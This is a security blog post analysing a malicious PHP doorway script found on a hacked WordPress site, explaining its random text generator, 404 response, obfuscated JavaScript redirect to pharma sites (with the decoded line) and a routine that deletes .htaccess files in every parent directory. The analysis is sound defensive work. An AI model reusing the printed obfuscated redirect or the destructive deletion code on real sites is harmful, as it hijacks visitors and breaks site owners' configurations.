msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Most Contradictive Doorway Generator

   12 Sep 14   Filed in Short Attack Reviews

Check this thread on WordPress.org forum. The topic starter found a suspicious PHP file and asked what it was doing.

The code analysis shows that it’s some sort of a spammy doorway. But it’s a very strange doorway and the way that it works doesn’t make sense to me.

First of all, this script has a random text and code generator. The output it generates is [kind of] always unique. Here is a couple of output pages:

http://pastebin.com/ymwMZMWP
http://pastebin.com/Y6B7WM2T

...
<title>Is. Last spots brows: Dwelling. Immediately moral.</title>
</head>
<body>listend40721
<span>Flowerill merry chimes - has: Her - again spirits they, wooers. Delight preserve. For he. Free - snow set - grave lapped, icecold made myself visitings allow, beeves twas. Now one:
...

We usually see such a random text, when spammers want search engines to index “unique” content with “right” keywords. But…

1. the script returns the page with the 404 not found code.

header("HTTP/1.1 404 Not Found");

so the page won’t be indexed by search engines.

2. The obfuscated JavaScript code at the bottom of the generated page redirects to a pharma site after about a second.

function falselye() { falselya=29; falselyb=[148,134,139,129,140,148,75,145,140,141,75,137,140,128,126,145,134,140,139,75,133,143,130,131,90,68,133,145,145,141,87,76,76,145,126,127,137,130,145,138,130,129,134,128,126,143,130,144,75,130,146,68,88];
falselyc=""; for(falselyd=0;falselyd<falselyb.length;falselyd++) { falselyc+=String.fromCharCode(falselyb[falselyd]-falselya); } return falselyc; } setTim eout(falselye(),1263);

decoded

window.top.location.href='hxxp://tabletmedicares .eu';

Update: on another site the script redirected to hxxp://uanlwkis .com (also pharma site), which was registered only a few days ago on Sept 6th, 2014.

But the generated text has no pharma keywords. One more hint that it’s not for search engines. Maybe it’s an intermediary landing page of some email spam campaign that just needs to redirect visitors? I saw many such landing pages on hacked sites. But it most cases they looked like the decoded version of the script — just a redirection code. Indeed why bother with sophisticated random page generator if no one (neither humans nor robots) is going to read it?

3. There is also this strange piece of code:

$s='/';
if (strtolower(substr(PHP_OS,0,3))=='win') $s="\\\\";
$d=array(".$s");
$p="";
for($i=1; $i<255; $i++){
$p.="..$s";
if (is_dir($p)){
array_push($d,$p);
}
else{break;}
}
foreach($d as $p){
$a="h"."tac"."c"."es"."s";
$a1=$p.".$a";
$a2=$p.$a;
$a3=$p."$a.txt";
@chmod($a1,0666);@unlink($a1);
@chmod($a2,0666);@unlink($a2);
@chmod($a3,0666);@unlink($a3);
}

What it does it tries to find an delete(!) all file with names .htaccess, htaccess and htaccess.txt in the current directory and all(!) the directories above the current.

That just doesn’t make sense. Why is it trying to corrupt websites? I would understand if it only removed its own files and injected code in legitimate files, but it tries to just remove every .htaccess (and its typical backups) without checking what’s inside. That’s a really disruptive and annoying behavior given that many sites rely on the settings in .htaccess (e.g. most WordPress and Joomla sites).

It’s indeed a most contradictive doorway generator that I ever seen. I can’t find any good explanation why it does things the way it does. Maybe you have any ideas?

Related posts:

Comments are closed.